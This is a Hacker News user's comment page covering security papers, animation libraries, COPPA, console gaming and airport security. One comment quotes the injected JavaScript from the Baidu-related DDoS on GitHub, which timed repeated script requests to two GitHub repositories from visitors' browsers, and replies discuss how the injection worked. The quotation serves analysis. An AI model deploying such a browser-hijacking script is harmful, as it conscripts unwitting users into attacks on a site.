Hacker Newsnew | comments | show | ask | jobs | submit | valgaze's comments login

This isn't germane to the main topic but this paper they cite about using a compiler pass to verify OS security ("Protecting Applications from Hostile Operating Systems") is pretty darn interesting: http://sva.cs.illinois.edu/pubs/VirtualGhost-ASPLOS-2014.pdf

Try it out here: https://jsfiddle.net/valgaze/wpL2La7d/

If this is in fact how how things worked, what a great showstopper bug

Looks like 's' is also considered valid in this example

And so is any part of the full word (s, st, ste, stea, steam)

Similarly, like spaghetti shops, small software companies do not primarily make money because of "features." The notion that software is bought because of features is something that running a software company will quickly disabuse you of.

There's an old & cheesy (maybe true, maybe not) cliche: "Features TELL, benefits SELL"


"All current and former Army National Guard members since 2004 could be affected by this breach because files containing personal information was inadvertently transferred to a non-DoD-accredited data center by a contract employee [...]"


I may be overly cynical of US government policies and procedures, but I read this as someone tried to use AWS or similar without permission.


I'm reminded of the breach reported by Britain's National Health Service in 2014 (http://www.theguardian.com/society/2014/mar/03/nhs-england-p...), where data was uploaded to make use of Google's big-data sifting technologies in violation of NHS policy about secured storage of British citizenry PII.

The irony that the data had been uploaded to a physically secured, encrypted datacenter network from 27 DVDs in the possession of someone who could do whatever they wanted to with the contents of those DVDs without audit was not lost on me.

I don't reference this to imply it was good and proper use of the data; merely to note the difference between policy security and actual security.


That's not cynical at all, and the reason why Amazon is currently working on building DoD approved data centers (Not sure if it was in mainstream news... I saw it when I was browsing job listings)


If this library is too much muscle & you just need a serviceable animation library, check out Daniel Eden's animate.css: https://github.com/daneden/animate.css

Demo: http://daneden.github.io/animate.css/

Of course there's always a the danger of "overdoing it" w/ ridiculous animations but if you can avoid that temptation it's a very handy tool.


I'm actually working on adding more subtle, and understated animations to compliment his library at the moment: http://gabrielmtn.github.io/reanimate/

It's a definite WIP so any thoughts / ideas / opinions are welcome: Gabrielmtn+github@gmail.com


This is an interesting payments case b/c with kiddos in the United States you need to deal with the Children's Online Privacy Act (ie the reason for the "are you 13 years or older" checkbox question)

One firm that's was trying to do kid payments was Virtual Piggy (now Oink): http://www.oink.com


> the reason for the "are you 13 years or older" checkbox question

I thought all the age-of-13 stuff, specifically, was because you can't legally enter yourself into a contract when you're younger than 13. Which is to say, you can't accept EULAs or Terms of Service (or you can, but they'll have no legal force.)


It's COPPA. https://en.wikipedia.org/wiki/Children%27s_Online_Privacy_Pr...

Some people even consider COPPA to be a form of censorship. It creates such a huge legal burden on websites if they allow < 13 year olds, that most websites have to ban them, thus limiting their right to speech.


Obviously it depends on the jurisdiction, but typically minors cannot enter legally binding contracts. Some form of source:


One interesting feature I wasn't aware of is that this does not generally apply to "necessities" or employment contracts.


It seems like the big gripe with consoles is that there's a performance ceiling and the supposed benefit of a PC is that there simply is no ceiling. The game can look as rad as you want to pay for.

But consoles have something that PCs don't-- a floor. If a kiddo buys any piece content for their xbox or whatever, the darn thing will run guaranteed and be pretty OK.

The same definitely not true for new a piece of content on a PC.

PC's might not have a performance ceiling but they probably need a baseline floor. MAYBE these Steam Machines can help rectify it for down/middle market.


That's all true. If that was the only factor I might stick with consoles -- however, PCs have something else: A much more diverse collection of games. I'm interested in Steam machines largely because I would like to play PC games in a more Xbox-like way.

The fact that it will result in more games running on Linux is also a plus (for me).


I wouldn't want to trust 3/4 of the TSA folks I've encountered to run a cat house let alone exercise their independent judgement when it came to my safety or the safety of my friends and family getting on an airplane. While this isn't very polite, this screwup pretty clearly indicates that the TSA isn't exactly made up of "A-players."

Like most people pontificating/bitching about the TSA I of course have zero legit expertise in airport security, but I do have a bit of first hand experience at Ben Gurion airport in Israel where the threat level is generally pretty high.

The first thing you notice is that the security people always look like they are playing on game day. Unlike joe-blow TSA agent, these folks are alert, speak multiple languages, and likely get some specialized training to detect if someone is lying or was tricked/coerced into carrying a bomb.

It's weird-- the vibe is at times both more tense and also more relaxed than an American airport. The security people at Ben Gurion seem less like bureaucrats following procedures and more like smart people empowered to exercise their judgement (ex grandma isn't getting yanked out of line.)

Once you're in, you get asked some almost chit-chatty questions about what you're up to while they review your travel documents but the whole time it also feels like you're talking to an observant doctor or physician examining you for symptoms of an illness. If you "pass" their filter you're done & on your way in quite literally a minute or two (and it being Israel there's naturally some controversy about who gets selected for "extra" scrutiny and why.)

I've read that the problem in the US is that it's too big to cost-effectively implement a system like this everywhere and that's probably true. But maybe at least at the big/major airports there ought to be some equivalent specially-trained "hunters" who know their stuff.

It's a good thing that the agency head resigned because the TSA flunked a practice test instead of the real thing.


If you want to experiment with the graph try adjusting the a/b parameters here: https://www.desmos.com/calculator/3ugvl6yz4i


From the Sony pictures incident to the attack on that satirical magazine in Paris to this, it's getting pretty tiresome having to deal with authoritarian types who believe they should dictate what other people can say or access.

For those curious, see below for a write up of the malicious javascript (uses a simple ajax call & random number timer): http://insight-labs.org/?p=1682

document.write("<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"> \x3c/script>"); !window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");

startime = (new Date).getTime();

var count = 0;

function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3 }

url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];

NUM = url_array.length;

function r_send2() { var a = unixtime() % NUM; get(url_array[a]) }

function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0, beforeSend: function() { requestTime = (new Date).getTime() }, complete: function() { responseTime = (new Date).getTime(); b = Math.floor(responseTime - requestTime); 3E5 > responseTime - startime && (r_send(b), count += 1) } }) }

function r_send(a) { setTimeout("r_send2()", a) } setTimeout("r_send2()", 2E3);


Loading all of jQuery seems a little bit excessive when the only thing they're using is the $.ajax function. http://youmightnotneedjquery.com/#request


It's excessive if your goal is _solely_ to execute a repeating AJAX request. But, if I'm understanding the attack correctly, this script is injected _in place of_ jQuery requested from Baidu's CDN. If you want the affected sites to appear normal, so the users whose browsers you are highjacking will contribute to the DDOS for the longest possible period, then you want to ensure that jQuery does indeed load.

The OP further clarifies why jQuery is injected _twice_: seems the injection is occurring only for 1% of requests. So it appears the code is looking to see if it has triggered the injection itself, and fires another request if needed.


On which side are you ._.


Engineers don't care what side anybody is on, as long as the tech works.


> Engineers don't care what side anybody is on, as long as the tech works.

Good engineers do care. Don't mistake "being an engineer" with "being apathetic".



We knew the world would not be the same. A few people laughed, a few people cried, most people were silent. I remembered the line from the Hindu scripture, the Bhagavad-Gita... "Now, I am become Death, the destroyer of worlds."

Any engineer worth his salt absolutely understands the consequences of their actions on the world. Sometimes they understand a bit too late.


hey buddy


What's up pvam


He still went along with it.


> the Sony pictures incident

Most likely unrelated to North Korea and used for propagandistic purposes (including publicity for a below par movie).



Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | DMCA | Apply to YC | Contact